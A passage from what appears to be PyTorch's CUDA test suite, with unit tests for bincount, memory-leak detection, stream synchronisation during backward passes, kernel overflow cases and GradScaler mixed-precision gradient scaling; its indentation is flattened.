self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test multi block memory impl
# see `THRESH_NUMBER_BINS_FOR_MULTI_BLOCK_MEM` in SummaryOps.cu
t = torch.randint(500, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test global memory impl
# see `THRESH_NUMBER_BINS_FOR_GLOBAL_MEM` in SummaryOps.cu
t = torch.randint(2000, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
t = torch.zeros([10], dtype=torch.int32, device='cuda')
# 35488 * 65536 as int32 would overflow to a negative value,
# giving a negative bin offset
t[0] = 35488
counted = t.bincount(minlength=65536)
self.assertEqual(torch.sum(counted), 10)
def test_tiny_half_norm_(self):
a = torch.arange(25).cuda().float()
a /= 100000000
b = a.half()
self.assertGreater(b.norm().item(), 0)
def test_norm_type_conversion(self):
a = torch.ones(65536).cuda().half()
self.assertEqual(a.norm(p=0, dtype=torch.float32), 65536)
# Verifies that mem_get_info works, including when called for a different device
def test_mem_get_info(self):
def _test(idx):
before_free_bytes, before_available_bytes = torch.cuda.mem_get_info(idx)
# increasing to 8MB to force acquiring a new block and overcome blocksize differences across platforms
t = torch.randn(1024 * 1024 * 8, device='cuda:' + str(idx))
after_free_bytes, after_available_bytes = torch.cuda.mem_get_info(idx)
self.assertTrue(after_free_bytes < before_free_bytes)
self.assertEqual(before_available_bytes, after_available_bytes)
_test(0)
if TEST_MULTIGPU:
_test(1)
# Test that wrap_with_cuda_memory_check successfully detects leak
# skip for ROCM. Look into #62533.
@skipIfRocm
def test_cuda_memory_leak_detection(self):
l = []
@self.wrap_with_cuda_memory_check
def no_leak():
pass
@self.wrap_with_cuda_memory_check
def leak_gpu0():
# increasing to 8MB to force acquiring a new block and overcome blocksize differences across platforms
l.append(torch.randn(1024 * 1024 * 8, device=torch.device("cuda:0")))
no_leak()
with self.assertRaisesRegex(RuntimeError, r"CUDA driver API confirmed .+ on device 0.+"):
leak_gpu0()
if TEST_MULTIGPU:
@self.wrap_with_cuda_memory_check
def leak_gpu1():
# increasing to 8MB to force acquiring a new block and overcome blocksize differences across platforms
l.append(torch.randn(1024 * 1024 * 8, device=torch.device("cuda:1")))
with self.assertRaisesRegex(RuntimeError, r"CUDA driver API confirmed .+ on device 1.+"):
leak_gpu1()
def test_cuda_memory_leak_detection_propagates_errors(self):
with self.assertRaisesRegex(RuntimeError, r"The size of tensor a \(3\) must match"):
with self.assertLeaksNoCudaTensors():
x = torch.randn(3, 1, device='cuda')
y = torch.randn(2, 1, device='cuda')
z = x + y
def test_trilu_indices(self):
for test_args in tri_tests_args:
_compare_trilu_indices(self, *test_args, device='cuda')
# test default options
x = torch.ones(
3, 3, dtype=torch.long, device='cuda', layout=torch.strided)
self.assertEqual(
x.tril(0).nonzero().transpose(0, 1),
torch.tril_indices(3, 3, device='cuda'))
self.assertEqual(
x.triu(0).nonzero().transpose(0, 1),
torch.triu_indices(3, 3, device='cuda'))
def test_large_trilu_indices(self):
for test_args in tri_large_tests_args:
_compare_large_trilu_indices(self, *test_args, device='cuda')
@unittest.skipIf(not TEST_MEDIUM_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow(self):
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**30 + 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**30]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**30], expected)
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow_large(self):
# Make sure input.numel() > INT_MAX is handled:
x = torch.randn(1, 1, 1, 2**31, dtype=torch.float16, device="cuda")
with self.assertRaisesRegex(RuntimeError, "integer out of range"):
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**31 - 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**31 - 2]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**31 - 2], expected)
# this might create a reference cycle on self...
def _make_multiply_in_stream(self):
class MultiplyInStream(torch.autograd.Function):
@staticmethod
def forward(ctx, x, val):
ctx.val = val
ctx.stream = torch.cuda.current_stream()
return x * val
@staticmethod
def backward(ctx, grad):
self.assertEqual(torch.cuda.current_stream(), ctx.stream)
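# Autograd is expected to replay each backward op on the stream that was
# current during the matching forward call; the assert above checks exactly
# that, and the _sleep below keeps that stream busy so missing syncs surface
# as wrong gradients.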
# delays the operation in the background stream
torch.cuda._sleep(1000 * 5000)
return grad * ctx.val, None
return MultiplyInStream
@skipCUDANonDefaultStreamIf(True)
def test_streaming_backwards_sync(self):
default_stream = torch.cuda.current_stream()
stream = torch.cuda.Stream()
MultiplyInStream = self._make_multiply_in_stream()
# Tests using grads outside the backward() stream context
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 2)
output.sum().backward()
# sync needed
default_stream.wait_stream(stream)
self.assertEqual(x.grad, torch.ones_like(x) * 2)
self.assertEqual(torch.cuda.current_stream(), default_stream)
# Tests that using grads in the same stream context as backward()
# is safe regardless what streams bwd ops ran on
bwd_ambient_stream = torch.cuda.Stream()
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 3)
with torch.cuda.stream(bwd_ambient_stream):
bwd_ambient_stream.wait_stream(stream)
output.sum().backward()
# x was first used on "stream" so its AccumulateGrad leaf should run on "stream".
# The end of backward() should have synced "bwd_ambient_stream" with "stream"
# so it should be safe to use x.grad here without any syncs.
self.assertEqual(x.grad, torch.ones_like(x) * 3)
self.assertEqual(torch.cuda.current_stream(), bwd_ambient_stream)
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
def test_streaming_backwards_multiple_streams(self):
MultiplyInStream = self._make_multiply_in_stream()
class StreamModel(torch.nn.Module):
def __init__(self):
super(StreamModel, self).__init__()
self.event = torch.cuda.Event()
self.stream0 = torch.cuda.Stream()
self.stream1 = torch.cuda.Stream()
def forward(self, x, x_first_use_on_ambient):
if x_first_use_on_ambient:
x0 = x.clone()
self.stream0.wait_stream(torch.cuda.current_stream())
self.stream1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(self.stream0):
if not x_first_use_on_ambient:
x0 = x.clone()
y0 = MultiplyInStream.apply(x0, 2)
self.event.record(stream=torch.cuda.current_stream())
with torch.cuda.stream(self.stream1):
y1 = MultiplyInStream.apply(x, 3)
self.stream1.wait_event(self.event)
return y0 + y1
stream = torch.cuda.Stream()
for x_first_use_on_ambient in (True, False):
# the out_of_place=False, iters=1 case stresses whether proper syncs are inserted
# when grads are initially None and stolen by backward ops.
for out_of_place, iters in ((True, 1),
(False, 1),
(False, 5)):
with torch.cuda.stream(stream):
x = torch.randn(5, 5, device='cuda', requires_grad=True)
model = StreamModel().cuda()
x.register_hook(lambda grad: self.assertEqual(torch.cuda.current_stream(),
stream if x_first_use_on_ambient else model.stream0))
for p in model.parameters():
self.assertTrue(p.grad is None)
for i in range(iters):
loss = model(x, x_first_use_on_ambient).sum()
if out_of_place:
x_grad = torch.autograd.grad((loss,), (x,))[0]
else:
loss.backward()
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
torch.cuda.current_stream().wait_stream(stream)
if out_of_place:
self.assertEqual(x_grad, torch.ones_like(x) * 5 * iters)
else:
self.assertEqual(x.grad, torch.ones_like(x) * 5 * iters)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_streaming_backwards_device_transfer(self):
# This function must run with non-default current streams on all devices, otherwise it's meaningless.
# The intention is to test that to()'s backward (CopyBackward) interacts properly with the
# synchronization logic in torch/csrc/autograd/input_buffer.cpp.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
# Unfortunately I need to make the tensors largeish.
# Bigger tensors = longer D2D transfers = more likely to expose races.
size = 2**26
a = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
b = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
# Here to_backward_recipient = a*b is used only once, so MulBackward's InputBuffer slot only expects 1 input.
# This tests the situation where we don't call InputBuffer::accumulate for MulBackward's InputBuffer.
to_backward_recipient = a * b
s = to_backward_recipient.to(device="cuda:0").sum()
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s.backward()
self.assertTrue(a.grad.sum().item() == size)
self.assertTrue(b.grad.sum().item() == size)
# Here to_backward_recipient = a*b is used twice, so MulBackward's InputBuffer slot expects 2 inputs.
# This tests the situation where we do call InputBuffer::accumulate for MulBackward's InputBuffer.
a.grad = None
b.grad = None
to_backward_recipient = a * b
# Multiply by 2 here so to's backward creates gradient values that are different from the case above,
# to mitigate weirdness if the caching allocator happens to reuse memory regions that were populated
# with 1s by the case above
s0 = to_backward_recipient.to(device="cuda:0").sum() * 2.
s1 = to_backward_recipient.to(device="cuda:0").sum() * 2.
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s0.backward(retain_graph=True)
s1.backward()
self.assertTrue(a.grad.sum().item() == 4 * size)
self.assertTrue(b.grad.sum().item() == 4 * size)
def test_streaming_backwards_sync_graph_root(self):
# This function tests if bwd ops running on a side stream properly sync with the GraphRoot.
# The potential bug it targets is a race condition. The test uses multiple trials and
# torch.cuda._sleep such that if the race condition exists, the test will almost certainly fail,
# but there's a chance it may spuriously pass. Passing does not guarantee the backend is bug-free,
# but failure does guarantee there is a bug.
fwd_bwd_op_stream = torch.cuda.Stream()
bwd_ambient_stream = torch.cuda.Stream()
# We need these streams to be different otherwise the test is meaningless.
self.assertTrue(fwd_bwd_op_stream != bwd_ambient_stream)
size = int(1e3)
a = torch.full((size,), 2.0, device="cuda", requires_grad=True)
b = torch.full((size,), 3.0, device="cuda", requires_grad=True)
# I don't think we need any manual record_streams below.
# a and b remain in scope for the entire test.
# c and grad remain in scope for each iteration, and there's a full sync between iterations.
for trial in range(5):
torch.cuda.synchronize()
a.grad = b.grad = None
with torch.cuda.stream(fwd_bwd_op_stream):
c = a * b
with torch.cuda.stream(bwd_ambient_stream):
torch.cuda.synchronize()
# Long-running dummy kernel on bwd_ambient_stream delays filling of grad
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
# Fills grad on bwd_ambient_stream
grad = torch.full((size,), float(trial + 1), device="cuda")
# Bwd ops still run on fwd_bwd_op_stream, so the following will likely fail if
# bwd ops don't sync with bwd_ambient_stream before consuming grad.
torch.autograd.backward(tensors=c, grad_tensors=grad)
# See https://github.com/pytorch/pytorch/issues/47028
# assertEqual calls below run on bwd_ambient_stream, so this test may also fail
# if backward() fails to sync with bwd_ambient_stream at the end.
# Synchronizing here works around the issue until a proper fix can be made.
torch.cuda.synchronize()
with torch.no_grad():
self.assertEqual(a.grad, grad * b)
self.assertEqual(b.grad, grad * a)
def test_streaming_backwards_callback(self):
# Tests if autograd callbacks sync properly with respect to leaf streams and
# the user-facing stream surrounding backward(). If it fails, first suspect is
# sync logic where "final_callbacks_" are called in torch/csrc/autograd/engine.cpp
MultiplyInStream = self._make_multiply_in_stream()
size = int(1e3)
a = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
b = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
stash = []
# sets up a nontrivial structure of leaf streams
s0.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s0):
c = MultiplyInStream.apply(a, 2)
s1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s1):
d = MultiplyInStream.apply(b, 3)
s1.wait_stream(s0)
e = c * d
def clone_leaf_grads():
stash.append(a.grad.clone())
stash.append(b.grad.clone())
# Use a hook on e to install the callback
e.register_hook(lambda grad: torch.autograd.Variable._execution_engine.queue_callback(clone_leaf_grads))
s2.wait_stream(s1)
with torch.cuda.stream(s2):
e.sum().backward()
# The autograd engine should sync s2 with all leaf streams then run the callback clone_leaf_grads on s2.
# If those things happened properly, checking the values of the cloned grads on s2 should be safe:
self.assertEqual(stash[0], torch.full_like(a, 6))
self.assertEqual(stash[1], torch.full_like(a, 6))
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
@unittest.skipIf(IS_SANDCASTLE or IS_REMOTE_GPU, "Does not work on Sandcastle")
def test_cuda_init_race(self):
# See https://github.com/pytorch/pytorch/issues/16559
import subprocess
subprocess.check_call([sys.executable, '-c', """\
import torch
import threading
def worker(rank):
torch.tensor([1.]).cuda(rank)
t1 = threading.Thread(target=worker, args=(0,))
t2 = threading.Thread(target=worker, args=(1,))
t1.start()
t2.start()
"""])
def test_fixed_cuda_assert_async(self):
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with no values is ambiguous"):
torch._assert_async(torch.tensor([], device="cuda"))
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with more than one value is ambiguous"):
torch._assert_async(torch.tensor([0, 0], device="cuda"))
torch._assert_async(torch.tensor(1, device="cuda"))
torch._assert_async(torch.tensor(0.1, device="cuda"))
torch._assert_async(torch.tensor(-0.1, device="cuda"))
torch._assert_async(torch.tensor(True, device="cuda"))
torch._assert_async(torch.tensor(0 + 0.1j, device="cuda"))
fail_stmts = [
"torch._assert_async(torch.tensor(0, device='cuda'))",
"torch._assert_async(torch.tensor(0.0, device='cuda'))",
"torch._assert_async(torch.tensor(False, device='cuda'))",
"torch._assert_async(torch.tensor(0 + 0j, device='cuda'))",
]
import subprocess
for stmt in fail_stmts:
with self.subTest(stmt=stmt):
r = subprocess.call([sys.executable, '-c', f"""\
import torch
{stmt}
torch.cuda.synchronize()
"""])
self.assertTrue(r != 0)
def test_grad_scaling_unscale(self, dtype=torch.float):
inv_scale = torch.full((1,), 0.25, dtype=torch.float, device="cuda:0")
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
size = 10
g = torch.full((size, size), 4.0, dtype=dtype, device="cuda:0")
ginf = g.clone()
ginf[2, 2] = float('inf')
gnan = g.clone()
gnan[2, 2] = float('nan')
# Tries selected combinations of
# - contiguous grads
# - g.clone().t() which is not contiguous but still non overlapping and dense
# - variants of g.clone()[:, :5] which are not non overlapping and dense
# Non overlapping and dense grads route into a multi tensor apply kernel,
# others use a fallback per-tensor kernel, so we should try both.
cases = (
([g.clone(), g.clone()], False),
([g.clone(), g.clone().t()], False),
([g.clone(), g.clone()[:, :5]], False),
([g.clone()[:, :5], g.clone()[:, :5]], False),
([g.clone(), ginf.clone()], True),
([g.clone(), gnan.clone()], True),
([g.clone(), ginf.clone()[:, :5]], True),
([g.clone(), gnan.clone()[:, :5]], True),
([ginf.clone(), g.clone()[:, :5]], True),
([ginf.clone()[:, :5], g.clone()[:, :5]], True),
)
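# _amp_foreach_non_finite_check_and_unscale_ multiplies every grad in-place by
# inv_scale and sets found_inf to 1.0 if any element is inf/nan, which is what
# the checks inside the loop below expect.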
for grads, has_inf in cases:
found_inf.zero_()
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
if has_inf:
self.assertEqual(found_inf, 1.0)
else:
self.assertEqual(found_inf, 0.0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# When passing lists with mismatched dtypes to a raw
# _amp_foreach_non_finite_check_and_unscale_ call,
# it's expected to fall back to single-tensor TensorIterator kernel.
grads = [g.clone(), g.to(dtype=torch.float16)]
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# Passing lists with mismatched devices to a raw
# _amp_foreach_non_finite_check_and_unscale_ call should raise errors.
if TEST_MULTIGPU:
with self.assertRaisesRegex(RuntimeError, r"Expected all tensors to be on the same device"):
torch._amp_foreach_non_finite_check_and_unscale_([g.clone(), g.to(device="cuda:1")],
found_inf,
inv_scale)
# Creates a list of grads with mismatched dtypes and devices, to ensure
# scaler._unscale_grads_ organizes grads by dtype and device before calling
# _amp_foreach_non_finite_check_and_unscale_ on each set.
# If inject_inf >= 0, writes an inf into one grad for _unscale_grads_ to find.
def perfect_storm_grads(inject_inf):
grads = [g.clone(), g.clone()[:, :5], g.to(dtype=torch.float16), g.to(dtype=torch.float16)]
if TEST_MULTIGPU:
grads += [g.to(device="cuda:1"),
g.to(device="cuda:1")[:, :5],
g.to(device="cuda:1", dtype=torch.float16),
g.to(device="cuda:1", dtype=torch.float16)]
if inject_inf >= 0:
grads[inject_inf][2, 2] = float('inf')
return grads
scaler = torch.cuda.amp.GradScaler()
dummy_params = [torch.empty_like(g) for g in perfect_storm_grads(-1)]
dummy_opt = torch.optim.SGD(dummy_params, lr=1.)
# Ensures the inf/nan checking can find an inf injected onto any grad in the perfect storm.
for inject_inf in range(-1, len(dummy_params)):
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
grads = perfect_storm_grads(inject_inf)
for i, p in enumerate(dummy_params):
p.grad = grads[i]
found_inf_per_device = scaler._unscale_grads_(dummy_opt, inv_scale, found_inf, True)
if inject_inf < 0:
# No inf was injected, ensures unscaling worked normally.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
else:
# inf was injected, ensures inf was found.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 1)
def test_grad_scaling_update_scale(self, device="cuda", dtype=torch.float):
growth = 2.0
backoff = 0.25
growth_interval = 2
scale = torch.full((1,), 4.0, dtype=dtype, device=device)
growth_tracker = torch.full((1,), 0.0, dtype=torch.int32, device=device)
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
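# _amp_update_scale_ grows the scale by `growth` once `growth_interval`
# consecutive unskipped steps have been seen, and multiplies it by `backoff`
# (resetting the tracker) whenever found_inf is nonzero; the assertions below
# walk through both paths.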
# Simulates 2 consecutive unskipped iterations
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 1)
self.assertEqual(scale, 4.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 8.0)
# Simulates a skipped iteration
found_inf.fill_(1.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 2.0)
def test_grad_scaling_unscale_sparse(self, device="cuda", dtype=torch.float):
scaler = torch.cuda.amp.GradScaler()
inv_scale = torch.full((1,), 0.25, dtype=dtype, device=device)
found_inf = torch.empty((1,), dtype=dtype, device=device)
cur = found_inf.device
# As of d0c925f (4/16/20), docs are unclear about best API for sparse cuda tensor construction.
# https://pytorch.org/docs/master/tensors.html shows torch.sparse_coo_tensor(...), but it has no docstring.
# The same page shows several tensors with layout=torch.sparse_coo, but no constructors using that layout.
# Meanwhile, https://pytorch.org/docs/master/sparse.html shows torch.sparse.FloatTensor(...), which looks
# legacy and does not accept a device="cuda" kwarg. Going with torch.sparse_coo_tensor.
i = torch.tensor([[0, 1, 1],
[2, 0, 2]], device="cuda", dtype=torch.int64)
v = torch.tensor([16., 32., 64.], device="cuda", dtype=torch.float)
s = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
p = s.clone()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s / 4).to_dense())
v = torch.FloatTensor([16., 32., float('inf')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
v = torch.FloatTensor([16., 32., float('nan')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
p = s.clone().half()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone().half()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s.half() / 4).to_dense())
# Creates fp16 sparse tensor with duplicated indices (uncoalesced). The uncoalesced representation
# does not overflow in fp16, but the coalesced representation would, because 64000 + 64000 > fp16 max.
# _amp_foreach_non_finite_check_and_unscale_ should report an overflow here.
i = torch.LongTensor([[0, 1, 0],
[2, 0, 2]])
v = torch.FloatTensor([64000., 32., 64000.])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=torch.float16)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 1.0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_device_as_key(self):
# Ensure that different instances of "device" objects that point to the same device
# are treated as identical keys by dicts. GradScaler relies on this behavior, and may
# error otherwise in a way that's difficult to detect (a silent performance hit).
d = {}
t = torch.empty((1,), device="cuda:0")
dev0a = torch.device("cuda:0")
dev0b = torch.device("cuda:0")
dev1a = torch.device("cuda:1")
dev1b = torch.device("cuda:1")
self.assertTrue(hash(dev0a) == hash(dev0b))
self.assertTrue(hash(dev1a) == hash(dev1b))
d[dev0a] = "0a"
d[dev0b] = "0b"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "0b")
d[t.device] = "t"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "t")
d[dev1a] = "1a"
d[dev1b] = "1b"
self.assertTrue(len(d) == 2)
self.assertTrue(d[dev1a] == "1b")
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_scale(self):
scaler = torch.cuda.amp.GradScaler(init_scale=2.)
t0 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0")
t1 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:1")
# Create some nested iterables of tensors on different devices.
outputs = (t1.clone(), (t0.clone(), t1.clone()), [t0.clone(), (t1.clone(), t0.clone())])
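# scale() should multiply every tensor inside the (possibly nested) iterable by
# the current scale (2.), and the lazily-created scale tensor should live on the
# device of the first tensor it saw (t1 on cuda:1), as asserted below.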
outputs = scaler.scale(outputs)
self.assertTrue(outputs[0] == 8.0 and outputs[1][0] == 8.0 and outputs[1][1] == 8.0 and
outputs[2][0] == 8.0 and outputs[2][1][0] == 8.0 and outputs[2][1][1] == 8.0)
self.assertTrue(scaler._scale.device == t1.device)
def test_grad_scaling_state_dict(self):
for lazy_init_scale in True, False:
s0 = torch.cuda.amp.GradScaler(init_scale=3., growth_factor=4., backoff_factor=.5, growth_interval=2)
s1 = torch.cuda.amp.GradScaler(init_scale=6., growth_factor=7., backoff_factor=.8, growth_interval=1)
# sets a random value for load_state_dict to overwrite
s1._init_growth_tracker = 7
if lazy_init_scale:
# Dummy scale() call to ensure the scale tensor is lazily initialized.
s1.scale(torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0"))
self.assertTrue(isinstance(s1._scale, torch.cuda.FloatTensor))
s1.load_state_dict(s0.state_dict())
self.assertEqual(s1.get_scale(), 3.)
self.assertEqual(s1.get_growth_factor(), 4.)
self.assertEqual(s1.get_backoff_factor(), .5)
self.assertEqual(s1.get_growth_interval(), 2)
self.assertEqual(s1._init_growth_tracker, 0)
def _create_scaling_models_optimizers(self, device="cuda"):
# Create a module+optimizer that will use scaling, and a control module+optimizer
# that will not use scaling, against which the scaling-enabled module+optimizer can be compared.
mod_control = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
mod_scaling = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
s.data.copy_(c.data)
opt_control = torch.optim.SGD(mod_control.parameters(), lr=1.0)
opt_scaling = torch.optim.SGD(mod_scaling.parameters(), lr=1.0)
return mod_control, mod_scaling, opt_control, opt_scaling
def _create_scaling_case(self, device="cuda", dtype=torch.float):
data = [(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device))]
loss_fn = torch.nn.MSELoss().cuda()
skip_iter = 2
return self._create_scaling_models_optimizers(device=device) + (data, loss_fn, skip_iter)
# _run_scaling_case generalizes some single-optimizer test logic to avoid too much copy-pasting below.
def _run_scaling_case(self, run, unskipped, skipped, atol=1e-7):
# Ensure scaling can be disabled without changing user control flow.
for enabled in True, False:
mod_control, mod_scaling, opt_control, opt_scaling, data, loss_fn, skip_iter = self._create_scaling_case()
# For functionality, test with a modest initial scale, and an unrealistically-large growth factor
# so any potential errors with the growth factor handling will be magnified.
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
_ = run(data, mod_control, opt_control, scaler, loss_fn, skip_iter, False)
ret = run(data, mod_scaling, opt_scaling, scaler, loss_fn, skip_iter, True)
# Allows run() to optionally return a different scaler instance.
scaler = ret if ret else scaler
# If scaling was enabled, the scale factor should have been multiplied by the growth factor
# len(data) - skipped times and the backoff factor "skipped" times.
if enabled:
net_growth = scaler.get_growth_factor()**unskipped if unskipped > 0 else 1.0
net_backoff = scaler.get_backoff_factor()**skipped if skipped > 0 else 1.0
self.assertTrue(scaler.get_scale() == (128. * net_growth * net_backoff))
else:
self.assertTrue(scaler.get_scale() == 1.0)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
self.assertEqual(c, s, atol=atol, rtol=1e-05)
# Compares no scaling + no autocasting against scaling + autocasting.
def test_grad_scaling_autocast(self):
try_pickle = False
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
with torch.autocast('cuda', enabled=try_scaling_api):
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
if try_pickle:
scaler = pickle.loads(pickle.dumps(scaler))
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
return scaler
# sets atol=1e-3 because we're comparing pure fp32 arithmetic vs a mixture of fp16 and fp32
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
# this will be picked up by try_pickle within run():
try_pickle = True
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
def test_grad_scaling_clipping(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
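# Gradients are still multiplied by the loss scale at this point, so the clip
# threshold below is scaled by the same factor; clipping is then equivalent to
# clipping the unscaled gradients at max_norm, matching the control path.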
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm * scaler.get_scale())
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-5)
def test_grad_scaling_clipping_separate_unscale(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm, error_if_nonfinite=False)
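# Here the grads were unscaled in-place first, so clipping can use max_norm
# directly; scaler.step() later sees that unscale_ was already called for this
# optimizer and does not unscale again.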
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
@unittest.skipIf(IS_WINDOWS, 'FIXME: fix this test for Windows')
